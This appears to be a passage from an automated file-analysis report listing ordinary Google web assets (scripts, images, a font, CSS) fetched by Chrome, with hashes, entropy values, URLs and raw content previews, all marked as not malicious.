                                                                                                                                                                                                                                                            Entropy (8bit):5.245030472254744
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF56uvytxKLoD0IZemBDHhimBDIyYpkbRNkN0:k6Pq769txKLoHgk1PBMyXrkK
                                                                                                                                                                                                                                                            MD5:D5F514B9CA75F62EB23243BD126E7E8A
                                                                                                                                                                                                                                                            SHA1:E00FEC6FA5353A0C6C79FA082613F7710398F063
                                                                                                                                                                                                                                                            SHA-256:E2A58A4AE1E9F561A448C1BE4FD1AEB577373023C09CEDDAA481957B996EFA0E
                                                                                                                                                                                                                                                            SHA-512:406C24BDD34ACB29E99D73D9D33B2F0D1D375C9773A12B82BF2406F427DD72788603077CC46DC81741F6D790D76C934892A60FE6A151237885D892AA4D4A8D8C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uD1GC,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=xuEY0"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("xuEY0");.var XS=function(a){_.jw.call(this,a.va)};_.C(XS,_.jw);XS.qa=_.jw.qa;XS.prototype.Hc=function(){return"xuEY0"};XS.prototype.Gd=function(){return!0};XS.prototype.Ic=function(){return _.US};_.iw(_.lsa,XS);_.Dv.xuEY0=_.Vz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1554
                                                                                                                                                                                                                                                            Entropy (8bit):4.133417333200851
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:tV0U/S903tFQRhYj45kRHDu9+u1lUetmCmifvqbbLaHu9HGn1u1lIdUWA/jTq9Kr:Z/S90PU5I1YdtmMqPLmum1YUUZ/jTq98
                                                                                                                                                                                                                                                            MD5:C5B92D70540100ACBE7A089EDD4AD521
                                                                                                                                                                                                                                                            SHA1:289EDD48A26448C16B24D8CEE077891AC256B63C
                                                                                                                                                                                                                                                            SHA-256:C2193804A202EB72C93FC3B18733063DA2FC140C1991AD624980C836AFD61D27
                                                                                                                                                                                                                                                            SHA-512:84244179B2669C0113F00FAADF2C4539F68DADD880A2E36149A31849AB3C654FE98F3FF3FDB1483438CC970FD25E29B35A85E7BE0F1B5CC490C3DCD249FD35A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg id="google-solid-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24zm15.76-2c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52zm28.58-8.03h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3.52 1.74 0 3.1 1.5 3.1 3.54.01
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):217166
                                                                                                                                                                                                                                                            Entropy (8bit):7.942438043319121
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:0heqOLvgouekDAxIGAF1BR55NLO9jj604mMfXJwia1sNy5ABPCeiO2z:01Oj5urDF7R5POEXJwiFy2BPbiO2z
                                                                                                                                                                                                                                                            MD5:A9049BDBEC3B156F4E06C16C4C5F224F
                                                                                                                                                                                                                                                            SHA1:0D59B5A0F9642F89ECA6C965A67C2B8A7D3F72F3
                                                                                                                                                                                                                                                            SHA-256:A5982C2B5C5DCBF6F6594CE88EA326BBD3F09BC896A8E9BB532529A83BD39005
                                                                                                                                                                                                                                                            SHA-512:A8DE4E409ECCAA01AE6EA4C72C327EC5CA24786DBF430A6E720007C742AFA408BBAD9D0CA58B8AB48B669BF0D9333E4B8E7AC8A5C9B829F6806E9D36B5E3F7D4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a.....~.............k..<..........d.....W..h..PW.....A..H.....X.....D..R...9.......0....-XK..<.........^h.Jt...J.......%.....|..[..D..E...._..Y.....>..E..y.........9G......0...c......5A..y..............r........8.....b..g..s..5......"3k..ly.I..k.....{..{..{..L.......b..s..A...nr:w...................c..]...A.......Q..H...........;.................s.....\V.U...........................................w....u.....v...........U.................g..I.........d.....................a..............f...........I..u..M..S.....f......................................A.....E..........E...d..............................8.....f.................w....v..k..v....q..].-..#v......v....d...... ........i..~.....$...^.....S.............................;.....!..NETSCAPE2.0.....!.....~.,............w..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):5430
                                                                                                                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/favicon.ico
                                                                                                                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x330, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):56671
                                                                                                                                                                                                                                                            Entropy (8bit):7.923320488979839
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:eOZtatZjURa/ycGyaaUReYRNAwe291NHoQY:eO+VHGyaBMYUdwgQY
                                                                                                                                                                                                                                                            MD5:B2E82E8740F78C1ACF6B8940A02E5A03
                                                                                                                                                                                                                                                            SHA1:AD0CF2FB33611802CA2955A880A9E27660829CD3
                                                                                                                                                                                                                                                            SHA-256:F631725199C7DC0A21E5654B376E9AD75F5D77EAE7DB0A74E99BC3EF8CDE9F8B
                                                                                                                                                                                                                                                            SHA-512:E00F5A0CFC9EA94043031F05D7AA50AC042C7299C04D5A6D579601DC44B640AD6C74DBE9531B44173FAB1B20B62C1D5A7B7FF64C8A213F428939FC845269F55A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1324x440, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):243881
                                                                                                                                                                                                                                                            Entropy (8bit):7.968961307679861
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:lWOGC9I7s8Tt+VSE5rlTW8mbQN+FZljrlZIKvozuJ1jgAek7Se:lWOG3JT4VSSCbQN+FZlHlLUusA9We
                                                                                                                                                                                                                                                            MD5:9B6220B4717A3505C16812F099C5504D
                                                                                                                                                                                                                                                            SHA1:A7ADA4C05FB21B60C1DD657E3A29569290B6315E
                                                                                                                                                                                                                                                            SHA-256:95F4670AB98E1E464F4E10AE4A6598CB57A0979915FF69A40A2A413E4E2FB187
                                                                                                                                                                                                                                                            SHA-512:A15B80B16817CCB94AB68928C88517316F3E35601452ABF43CC62AC2CE9C63034600358229CF871EC9692A6D3DAEA8E559E04BE88E42C32155BA6C52DE11E138
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.....C....................................................................C.........................................................................,..............................................C...............................!."1..#2AQ.$a%q3BR..&C.'4....E......................................J.........................!1.AQ.."aq2.....#B.....3R..b.$4Cr..%S..5c...&s.............?.....D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 162924, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):162924
                                                                                                                                                                                                                                                            Entropy (8bit):7.998614826254304
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:XdhkQyBlHVVYwHUFDrzXtPz/qJwZmUyhjpimMS6DW4hb59a06EziVFKth8Biq:wQyBBvYw0FD/tPWJZjI3PXhbrduVFc8f
                                                                                                                                                                                                                                                            MD5:7F2E1B48B71EC58FDA4539018A2F56CC
                                                                                                                                                                                                                                                            SHA1:507BF81F52FA8C99BF2C5C8BD59A981899CA9995
                                                                                                                                                                                                                                                            SHA-256:7F80C4C91054B3D6C80721939242C2D4F68F15E41F251E12641F695D78EB2F35
                                                                                                                                                                                                                                                            SHA-512:DD7B52119D1179332147984F6C7D8CDCB3388AEB1E8AF708EF9036ACDDE6E7B3900ACC965221F4E4864DAD89797072E19E5B308CF065A65DDA7656BE884CDD77
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/materialiconsextended/v149/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvJ.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......|l..........|..................................`..P..........N.....6.$.... .... [.m.A.B.$...c....5s/E...%.u..v..J6...:......;............$........@..M..... 8.HA.6%R...tB ..D..M".f.$G.....<....~.y;..R..23.S.T...p...'V{|u.,S....Z...lZ)..Dc..D..;=n...V...<.X6...h.......:sw.....T.6.eF..!=*.f..H\..dDd*.q"s.E.Q......JT..v..#Mf"sH}A.>.....q.h.mLC...Q..Cv...+|.u......6..B...I......K..I...R.[..m(...P<B."R.Ap.f.j:.o...\o..L..G3Yn.C..........\rI..$$!DH.!....v0r.E...p..WK.v...muW...*X.[. ......j...1\U..8V.&.X..i.T^TO..^\......&.g2Iv....>.J(.T.*..y...v....4.f..a....$.K...M-5...1D.ya...'.'...A ....!.@..c...$.D.3q..:...:&O.rV..V..v.m...[-.Z..m.......:o......$}.h..i.N.FH.$(..Zq....v...k. ._.A...J&.J..D.......>...~!...H.".$........_...;v...*gU....W Y3lI...;.....RG.....|.rw.. ..=@.....N.....=.W..=O.(...`..M......Y..&.O. R..'0.~6@$.4f.`I@.dV{..YJ[j`v).1(.L.."(oO...R...cI(.l.K..P,1.C.b....A=,u.B....;wm..H{.>......8e.8d.2.~.4.CDDDDDDDD..|.Z..s.G!.._.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3059
                                                                                                                                                                                                                                                            Entropy (8bit):7.8035944355387254
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:UrX6hyoEPhndSeEKulTRuWyXTfw05THTTjWX+E9986uZ7yYPKdym4vSw9C10FUSS:yKhyhnIHankWzO+E9+5B3K76SgCeUSIb
                                                                                                                                                                                                                                                            MD5:35B477666B9EF9F48CF21C3CC4DDBDB5
                                                                                                                                                                                                                                                            SHA1:177913E1E6988AC0060DF81A9A78B7AEBAAD999E
                                                                                                                                                                                                                                                            SHA-256:3FD7CFE40301BB21BFB30BBD367F4FE48257601979566DA809826373058DEA8B
                                                                                                                                                                                                                                                            SHA-512:A7B92C786507B1069A9F8D48F66CDDFCC29F7E0F769B3CA745BA7F53A6554DE3F9C08C93BBD5D0FAE16B302ADC8CBBD2709F0E671A2D3285EAD046262F0F3910
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Google..............................................................................................................................................D.D...........................................8............................!1.AQ."..#2Vaq...$BRbr.....................................?........................!1.AQa..q..."2BRS.........#3b.....Ts.............?...#......2...ueR*..3...b.<...Y...;,..B.KM.%X.i.E!o.Z..|...!Q..<w...6..i..lw.Hc.e..t=....k..2+..P..F.#.....L......16..rI=...=.>.e......i..u.......\..?B..W.V;.Y.V/bV5S..N..%..{_-...=.?...kg.s'1.$[..3..V.m.....3...s3..%...M#;......[....E...b.#.)..y....N:h".gWN......mk.g5..#.d.,c ..`8....n".~.2.....s............H.6.Bo..*e.7..r..vj...h.&.W.^O...V.x..r...>..x.7......R.I...+.....d.fzv,..w:..|.k.[.slF..g.r...l`..2@.>..l.m..................F.%;....:H....S......]1#..W....Q~.$..>3.De4..m....A..V.E9..a1I+..sr..>..F@dlIvE..../..i.:.fi%u.8.]...*.R~.. ...Z......L.X
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):220064
                                                                                                                                                                                                                                                            Entropy (8bit):5.068630525632646
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:GNZ1v141T1v1N1s1f141q1d1v1B1U1n1x1B1c9VCcycAaOWZLyJD9cPUfvNWgOGB:spvCcycAznJ+sfzOGyc
                                                                                                                                                                                                                                                            MD5:EA47A5F85A9C7CA0B8EE554313D709A4
                                                                                                                                                                                                                                                            SHA1:D2C557473A5D53869E58FA46AE96C94DDA2C8E33
                                                                                                                                                                                                                                                            SHA-256:B3AD4413CF68A39C669E44E1B6B84C57421CDFD2416B220582BAD5FF52A05702
                                                                                                                                                                                                                                                            SHA-512:473A9524AA9A1FC83280A47A02180E339838C8EE2368665E6074D65ED2F5066313EBF24F74D3DCA073C04D7038855193DBE8292347379384485D66971E06952F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.google.com/about/static/compiled/index.min.css?cache=d2c5574
                                                                                                                                                                                                                                                            Preview:/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;font-family:sans-serif}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:rgba(0,0,0,0)}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visib
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13875
                                                                                                                                                                                                                                                            Entropy (8bit):7.969426298400998
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:7SIe85Ucea4DRpiy16E/zAHkTzuVcHhqH1MYLgRuTnUYLV2ccBUek6J9dCQ:KcN4D3t1/LeWjH8H1MYLglYLxH6vAQ
                                                                                                                                                                                                                                                            MD5:1643D10D9A13B483DA88CC4EC7A702C1
                                                                                                                                                                                                                                                            SHA1:4560E153232DBF7523BF108372F1CDB2B119A34A
                                                                                                                                                                                                                                                            SHA-256:4750B9809702F568D2691010615B76ACE84BEC560DB76542DCE37107A817394A
                                                                                                                                                                                                                                                            SHA-512:80781025D6A0C10B3CD39B928399C44F5606F1E1D9F093BB226F39BA5269DC8127C21D1811160F51BD796619E8D39AF7BE5A37CC0CF1C04C869AF4F8DCB3A480
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.............<.q.....pHYs..........+.... .IDATx..y.e.u..9w{.{.u....)."..`.2.%..+F.l.,.r..T...D ..0......8....&....$.@[.m.$.MQCrf8...z......'......}U.....V.........~.....;...1..1..1..1..1..1..1..1..1..1..1..1..1..1.a$y....5.-9.eT.A8'p.8.,...3..J.a...f.#...R..[@..(t..T.....Px..G.. ....v@:.KW.GY.O.}..V..p.x....)<'".E.C9...?..Q."..."p..m.MD..n.+.KW.J.'..h.j][B.gDx....~......"./3...52!A......./*.#\...\.^..s.JzB.2......'@?..=.^.=.......!.k.|.........[...-.>v.j^.|F.O .} .p1~..]....................Wz.Z.#....Z.N.?..".2PU$RF............{>..A@.....{.u..L....m...0ML..4-,..9.,N...z...W...KW&+...#3......O@~DT?.`..ne....A.....}....~.A..7..w]<w@........M.-.l...m...`.....B..S,b.6.ibH.t........U.+.K.=.Fv....aU./D......TTq......v.^.C.....q..T..u.....$...v.8.".r.R.B.\.)..,+..............W6...Q..V.....Q~....8.yyA..m.ioo.i..i...}.`.U....!`.`.!oD.+#..0d(...1.j.;P!. .....!d*./.,..2.z.J.N...)........+.....K..kw.......Z.,.?........i8H..@.u;477inl...!..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 660x255, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):99350
                                                                                                                                                                                                                                                            Entropy (8bit):7.973790140768698
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:XGY6Ks1dANp742EeGkKsYHKa48+tFhUuq3CEt:vtte2EvkHYHKa9qFg3
                                                                                                                                                                                                                                                            MD5:5645515D0FA6BF88ED5EB58F3229BD63
                                                                                                                                                                                                                                                            SHA1:725598A5885740C837D7DEDD8848E3A82C43B830
                                                                                                                                                                                                                                                            SHA-256:2997DADB3274EACBAB9830144A55914597A73DD922E26CAF4BD83141B2715653
                                                                                                                                                                                                                                                            SHA-512:3576CD219144BA377306238CB6141977E02B8940EFD527CF3503F4A2C55A15AE10D3DB940C0424B333760A2FC6D1B4E85F0DDE6A3362A69CBF398C2B0E9F0F67
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/Bo4-9K6wiEyWZr1x4IfvOeB_NFv8MGC8kqmS--hCUaR0B0puSgikWbDppKEeYSd2bxdhPT9wfcSPdX35aIjShic_UaI8AnK9kUrE1ZVWlg=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............RExif..II*.......1.......&...;.......-.......Picasa.Jon Wiley and Micheal Lopez.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Cond
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):40511
                                                                                                                                                                                                                                                            Entropy (8bit):7.953850467871527
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:2fRtB5YXdQ43DmYcEMgufv9PsmrtmRaEi4tJlINYZGOiXCoY6tahze:ktgTDsEMgYRlrMRaX8JGqZGOiXR7tahC
                                                                                                                                                                                                                                                            MD5:8A711ABACE54CFA2EB384E2DBF5D5C9B
                                                                                                                                                                                                                                                            SHA1:06B500BCCF0E96501C66609E22EA96BF39E4FFF9
                                                                                                                                                                                                                                                            SHA-256:A2AE90401FCD9DBAB22A643D8674B56283818D261E8E02029889EC625E15870D
